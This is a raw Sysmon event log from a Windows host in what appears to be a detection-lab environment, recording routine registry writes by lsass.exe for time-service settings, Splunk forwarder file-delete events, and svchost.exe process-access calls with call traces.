13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a962-0x2cfc4b87) 13241300x800000000000000036496979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a96a-0x8ec0b387) 13241300x800000000000000036496978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a972-0xf0851b87) 13241300x800000000000000036496977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 
13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036496976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a30c771) 13241300x800000000000000036496975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a962-0x2cfc4b87) 13241300x800000000000000036496974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a96a-0x8ec0b387) 13241300x800000000000000036496973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a972-0xf0851b87) 23542300x800000000000000036496972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:15.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D1502A063D421E9E72331519D7D8635C,SHA256=F976D21317C434A23D4E387051BEBA26736405A39CD0EC7083F093A8B104FB5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk 
space 23542300x800000000000000036496971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:15.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=651F8F3DD4517AD5152D5772589D6832,SHA256=B43AD5D914E5EFC41657B5EE9F87BF14D4782448B18AA781F10F022A845856DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:16.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C5011B3348C8B0116E9A00A4678FC69,SHA256=51839282B9D98B34D967BFBCEB996063D6937EEB8DD6361047D9C1704FF09287,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:17.128{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8D17EBCB66CF33C141FB90F696C3BB,SHA256=0F5A2524431A906E58A790CA13B7E2232C795B7E18E60E363B449805C8EC8179,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 